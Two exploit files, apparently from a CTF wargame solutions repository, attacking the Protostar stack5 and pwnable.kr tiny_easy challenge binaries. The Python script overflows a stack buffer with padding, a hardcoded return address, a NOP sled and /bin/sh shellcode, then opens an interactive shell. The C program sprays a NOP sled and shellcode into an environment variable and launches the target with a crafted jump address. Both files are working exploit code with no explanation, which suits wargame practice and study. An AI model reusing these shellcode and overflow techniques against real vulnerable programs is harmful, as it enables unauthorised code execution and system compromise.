File: Binary/Pwnable.kr/reference/protostar/stack5/exp.py
from zio import *
target  = './stack5'
c_read  = COLORED(RAW, 'blue')
c_write = COLORED(RAW, 'green')
io      = zio(target, print_read = c_read, print_write = c_write)
io.gdb_hint([0x80483da])

shellcode = (
    "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31"
    "\xc9\x89\xca\x6a\x0b\x58\xcd\x80"
)

payload = 'A' * 76
payload += l32(0xbffff7d6)
payload += '\x90' * 16    
payload += shellcode

io.writeline(payload)
io.interact()

File: Binary/Pwnable.kr/reference/pwnable.kr/tiny_easy/exp.c
#include <stdio.h>
#include <string.h>
char shellcode[] =
        "\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46"
        "\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1"
        "\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
char payload[0x10000];

int main(int argc, const char *argv[])
{
    int i = 0;
    for (i = 0; i < 0xff00; i++){
        payload[i] = '\x90';
    }
    strcpy(payload + 0xff00, shellcode);

    char *my_argv[] = {"\x38\x5c\xe3\xff", NULL};
    char *my_env[]  = {payload, NULL};
    execve("./tiny_easy", my_argv, my_env);
    return 0;
}
